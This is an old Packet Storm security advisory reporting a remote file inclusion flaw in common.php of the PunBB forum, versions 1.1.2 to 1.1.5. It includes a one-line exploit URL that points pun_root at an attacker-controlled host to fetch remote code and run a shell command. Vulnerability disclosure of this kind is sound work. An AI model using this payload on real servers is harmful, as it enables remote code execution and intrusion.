punbb-1.1.2.txt

2005-10-26T00:00:00
ID PACKETSTORM:40970
Type packetstorm
Reporter rod hedor
Modified 2005-10-26T00:00:00

Description

                                        
                                            `  
Remote File Inclusion in forum PunBB  
  
Date:24/10/2005  
  
Severity: High  
  
version: 1.1.2 >> 1.1.5  
  
The bug reside in common.php  
  
  
  
Exploit :  
  
http://www.host.com/forum/include/common.php?pun_root=http://www.host_evil.com/cmd?&=id  
  
  
Discovery by RoDheDoR  
  
L-G-H Team  
  
http://www.lezr.com  
  
_________________________________________________________________  
FREE pop-up blocking with the new MSN Toolbar - get it now!   
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/  
  
`